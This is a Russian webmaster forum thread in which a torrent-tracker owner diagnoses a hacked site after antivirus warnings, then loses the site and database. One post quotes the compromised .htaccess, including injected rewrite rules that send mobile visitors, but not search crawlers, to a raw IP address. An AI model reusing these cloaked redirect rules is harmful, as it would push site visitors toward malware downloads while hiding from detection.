Бормотухи.НЕТ

Вернуться   Бормотухи.НЕТ > Web-мастеру > vBulletin 3.х
Расширенный поиск

vBulletin 3.х Раздел о vBulletin и всем что касается этого скрипта

Ответ
 
Опции темы Поиск в этой теме
Старый 07.08.2012, 07:34 Вверх   #1
Знаток
 
Аватар для dhonchik
dhonchik вне форума
Доп. информация
Вопрос Вредоносные ссылки

Привет всем, как выловить вредоносные ссылки, с недавних пор, неделю назад примерно, пользователем у которых каспер, он стал при заходе на сайт выдавать что ссылка вредоносная, ругается на сайт и не заходит с телефонных браузеров, просит чтото скачать, как эти ссылки поубивать?

Одна поправка что это на трекере, но там от булки отличий по коду мало)
  Ответить с цитированием
Старый 07.08.2012, 08:09 Вверх   #2
Знаток
 
Аватар для Marconi
Marconi вне форума
Доп. информация
По умолчанию

dhonchik, посмотри какие скрипты устанавливал последними.
В них надо покопаться.
Ссылка сама появится не может.

Последний раз редактировалось Marconi; 07.08.2012 в 08:11..
  Ответить с цитированием
Старый 07.08.2012, 08:15 Вверх   #3
Знаток
 
Аватар для dhonchik
dhonchik вне форума
Доп. информация
По умолчанию

Цитата Сообщение от Marconi Посмотреть сообщение
посмотри какие скрипты устанавливал последними.
я ставил в этот период, недели две назад, токо код тизерки адвмаркет, но код я удалил, а после этого стало юзерам писать про вредоносные ссылки, как их теперь выкурить и связано ли это с тизеркой я не знаю)

У кого каспер гляньте сами, вот трекер и попробуйте зайти с мобильного браузера:
pescups-tracker.org

Последний раз редактировалось dhonchik; 07.08.2012 в 08:26..
  Ответить с цитированием
Старый 07.08.2012, 12:38 Вверх   #4
Коренной житель
 
Аватар для weka
weka вне форума
Доп. информация
По умолчанию

да касперыч блокирует

Нажми для просмотра
  Ответить с цитированием
Cказали cпасибо:
Старый 07.08.2012, 13:10 Вверх   #5
Просто блондинка
 
Аватар для Luvilla
Luvilla вне форума
Доп. информация
По умолчанию

каспер ругается на /favicon.ico
virustotal.com там ничего не видит

Цитата Сообщение от dhonchik Посмотреть сообщение
не заходит с телефонных браузеров, просит чтото скачать
проверьте содержимое файла .хтаксесс
  Ответить с цитированием
Cказали cпасибо:
Старый 07.08.2012, 13:58 Вверх   #6
Знаток
 
Аватар для dhonchik
dhonchik вне форума
Доп. информация
По умолчанию

Цитата Сообщение от Luvilla Посмотреть сообщение
каспер ругается на /favicon.ico
virustotal.com там ничего не видит
Да я тоже проверил везде на вирусы, на вредные ссылки в вебмастере гугла и яши, ничего не нашло.

а вот то что ругается на фавикон, его надо удалить и сделать новый но уже на другом сайте?

Удалили фавикон, проверьте плиз заного, у меня нет каспера)

Добавлено через 3 минуты 32 секунды

Цитата Сообщение от Luvilla Посмотреть сообщение
проверьте содержимое файла .хтаксесс
Спасибо, там и вправду демон сидит

## Set charset server
AddDefaultCharset UTF-8

#RewriteEngine On

## Access control
<FilesMatch "\.(.*sql|tpl|inc|db|log)|(config|common).php$">
deny from all
</FilesMatch>
php_value allow_call_time_pass_reference On

RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk|bada|windows\ phone) [NC]
RewriteCond %{HTTP_USER_AGENT} !(accoona|ia_archiver|antabot|ask\ jeeves|baidu|dcpbot|eltaindexer|feedfetcher|gamespy|gigabot|googlebot|gsa-crawler|grub-client|gulper|slurp|mihalism|msnbot|worldindexer|ooyyo|pagebull|scooter|w3c_validator|jigsaw|webalta|yahoofeedseeker|yahoo!\ slurp|mmcrawler|yandexbot|yandeximages|yandexvideo|yandexmedia|yandexblogs|yandexaddurl|yandexfavicons|yandexdirect|yandexmetrika|yandexcatalog|yandex news|yandeximageresizer) [NC]
RewriteRule (.*) http://91.121.64.83/?2 [L,R=302]
То что я выделил удалил и теперь всё ровно, права 444 щас сделал на хтцасес, как же я вначале забыл, для форума поставил а на трекер забыл(

Последний раз редактировалось dhonchik; 07.08.2012 в 14:07..
  Ответить с цитированием
Старый 07.08.2012, 17:54 Вверх   #7
Просто блондинка
 
Аватар для Luvilla
Luvilla вне форума
Доп. информация
По умолчанию

Цитата Сообщение от dhonchik Посмотреть сообщение
там и вправду демон сидит
а теперь начинается самое интересное: ищите, через что хакер получил доступ к перезаписи файла
это либо уязвимость движка/хаков; либо влезли через сервер
начните с поиска шеллов
  Ответить с цитированием
Cказали cпасибо:
Старый 07.08.2012, 17:58 Вверх   #8
Знаток
 
Аватар для dhonchik
dhonchik вне форума
Доп. информация
По умолчанию

Цитата Сообщение от Luvilla Посмотреть сообщение
начните с поиска шеллов
А как примерно хоть их искать?) это какие-то файлы левые?

Добавлено через 2 минуты 18 секунд

Luvilla, меня вот эти файлы беспокоят, токо щас их заметил, это шеллы?


1.php тоже подозрительный какйо-то, вот его содержимое

<?php
echo $_SERVER['DOCUMENT_ROOT'];
?>

Последний раз редактировалось dhonchik; 07.08.2012 в 18:03..
  Ответить с цитированием
Старый 07.08.2012, 18:07 Вверх   #9
Знаток
 
Аватар для dhonchik
dhonchik вне форума
Доп. информация
По умолчанию

Содержимое тех файлов что под стрелками интересное, как раз что то про фавикон

<?xml version="1.0"?>
<OpenSearchDescription xmlns="http://a9.com/-/spec/opensearch/1.1/">
<ShortName>TorrentPier (Forum)</ShortName>
<Description>TorrentPier (Forum)</Description>
<InputEncoding>UTF-8</InputEncoding>
<Image height="16" width="16" type="image/x-icon">http://torrentpier.me/favicon.ico</Image>
<Url type="text/html" template="http://torrentpier.me/search.php?mode=results&amp;show_results=topics&amp;search_keywords={searchTerms}"/>
</OpenSearchDescription>
  Ответить с цитированием
Старый 07.08.2012, 21:02 Вверх   #10
Знаток
 
Аватар для dhonchik
dhonchik вне форума
Доп. информация
По умолчанию

Трекер убили вместе с базой данных, хииии плять( ппц какой-то!
  Ответить с цитированием
Старый 07.08.2012, 21:24 Вверх   #11
Знаток
 
Аватар для Marconi
Marconi вне форума
Доп. информация
По умолчанию

dhonchik, так объясни причину для простых смертных.
Чего нельзя делать?
А то читаю тут как на китайском языке, нифига не понимаю.
  Ответить с цитированием
Старый 07.08.2012, 22:23 Вверх   #12
Коварный тип
 
Аватар для Serberg
Serberg вне форума
Доп. информация
По умолчанию

Цитата Сообщение от Marconi Посмотреть сообщение
А то читаю тут как на китайском языке, нифига не понимаю.
Залилии шел, бахнули базу и скрипт, конец фильма. Надо открывать бэкап за сутки назад и ковырять его на наличие шела.
  Ответить с цитированием
Старый 07.08.2012, 22:25 Вверх   #13
Знаток
 
Аватар для Marconi
Marconi вне форума
Доп. информация
По умолчанию

Serberg, а что такое шел?
Я заправку такую знаю))
  Ответить с цитированием
Старый 07.08.2012, 22:33 Вверх   #14
Знаток
 
Аватар для dhonchik
dhonchik вне форума
Доп. информация
По умолчанию

Цитата Сообщение от Serberg Посмотреть сообщение
Залилии шел, бахнули базу и скрипт, конец фильма. Надо открывать бэкап за сутки назад и ковырять его на наличие шела.
Бэкап у меня есть, целиком, сегодня днём ещё успел сделать, но не додумался сделать бэкап базы данных, на работе загружен был, а её как раз грохнули вчером, все юзеры и темы с раздачами пропали, жесть(
  Ответить с цитированием
Старый 07.08.2012, 22:35 Вверх   #15
Знаток
 
Аватар для dhonchik
dhonchik вне форума
Доп. информация
По умолчанию

а этот сраный шел может перелесть на другой сайт?, у меня там же где и трекер, ещё три сайта висят
  Ответить с цитированием
Старый 07.08.2012, 22:47 Вверх   #16
Коварный тип
 
Аватар для Serberg
Serberg вне форума
Доп. информация
По умолчанию

Цитата Сообщение от dhonchik Посмотреть сообщение
а этот сраный шел может перелесть на другой сайт?, у меня там же где и трекер, ещё три сайта висят
У меня был шел в базе данных, через него получили полный доступ к файловой системе. Естественно получив полный доступ к файловой системе можно снести все файлы.
  Ответить с цитированием
2 пользователя(ей) сказали cпасибо:
Старый 07.08.2012, 22:57 Вверх   #17
Знаток
 
Аватар для dhonchik
dhonchik вне форума
Доп. информация
По умолчанию

Serberg, Может хостеру написать чтобы он попробовал найти шел этот? вдруг он и вправду не в папке с трекером был а в начале всех папок где нить(

и как теперь будут дела с индексацией, ведь старые страницы больше не будут действовать, а они всё ещё показываются что проиндексированы, мож плантону написать чтоб все страницы из индекса старые снял?
  Ответить с цитированием
Старый 07.08.2012, 22:58 Вверх   #18
Знаток
 
Аватар для Marconi
Marconi вне форума
Доп. информация
По умолчанию

dhonchik, почитай вот здесь
люди сталкивались, может поможет чем...

http://dle.net.ua/forum/index.php/to...dn3qpseorjsjpn
  Ответить с цитированием
Старый 07.08.2012, 23:08 Вверх   #19
Просто блондинка
 
Аватар для Luvilla
Luvilla вне форума
Доп. информация
По умолчанию

Цитата Сообщение от dhonchik Посмотреть сообщение
и как теперь будут дела с индексацией, ведь старые страницы больше не будут действовать
хостерский бекап есть?
если поднять последний бекап, полный, файлы + БД, ничего не изменится
  Ответить с цитированием
Старый 07.08.2012, 23:21 Вверх   #20
Знаток
 
Аватар для dhonchik
dhonchik вне форума
Доп. информация
По умолчанию

Цитата Сообщение от Luvilla Посмотреть сообщение
хостерский бекап есть?
если поднять последний бекап, полный, файлы + БД, ничего не изменится
Интересно, надо спросить, но у меня хостер мудазвон, отказался от айсикью, а на мыло отвечает раз в месяц ппц

Но мне нравится там скорость, всё моментом сайты летают, исппанель летает мигом и версия пхп и тд постоянно новая что обязательное требование к движку трекера
  Ответить с цитированием
Старый 08.08.2012, 08:59 Вверх   #21
Знаток
 
Аватар для dhonchik
dhonchik вне форума
Доп. информация
По умолчанию

Интересно, новый трекер накотили а каспер снова ругается
  Ответить с цитированием
Старый 08.08.2012, 10:09 Вверх   #22
Пользователь
 
Аватар для bbegles
bbegles вне форума
Доп. информация
По умолчанию

Цитата Сообщение от dhonchik Посмотреть сообщение
А как примерно хоть их искать?) это какие-то файлы левые?
Интересно а почему ты хак Инспектор файлов не ставил на форуме?
  Ответить с цитированием
Cказали cпасибо:
Старый 08.08.2012, 10:20 Вверх   #23
Знаток
 
Аватар для dhonchik
dhonchik вне форума
Доп. информация
По умолчанию

bbegles, потому что это не форум а трекер, все коды, футер и тд там похожи на булковские, но хаки не подходят а для трекера такого хака нету
  Ответить с цитированием
Старый 08.08.2012, 16:06 Вверх   #24
Знаток
 
Аватар для dhonchik
dhonchik вне форума
Доп. информация
По умолчанию

а как может вебмастер отключить форум например, не зная пароля от панели хостинга, там где папки с сайтами и он же не админ на сайте и не модер, то есть не может попасть в админку никак, ниче не понимаю.

Кто то у меня ползает по папкам, или где то ползает, но паролей он точно не знает не от чего.
  Ответить с цитированием
Старый 08.08.2012, 16:30 Вверх   #25
Пользователь
 
Аватар для bbegles
bbegles вне форума
Доп. информация
По умолчанию

dhonchik, если содержится шелл то отключить возможно
  Ответить с цитированием
Ответ


Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход


Текущее время: 08:09. Часовой пояс GMT +3.


Powered by vBulletin® Version 3.8.7
Copyright ©2000 - 2024, vBulletin Solutions, Inc. Перевод: zCarot
 

Время генерации страницы 0.21072 секунды с 11 запросами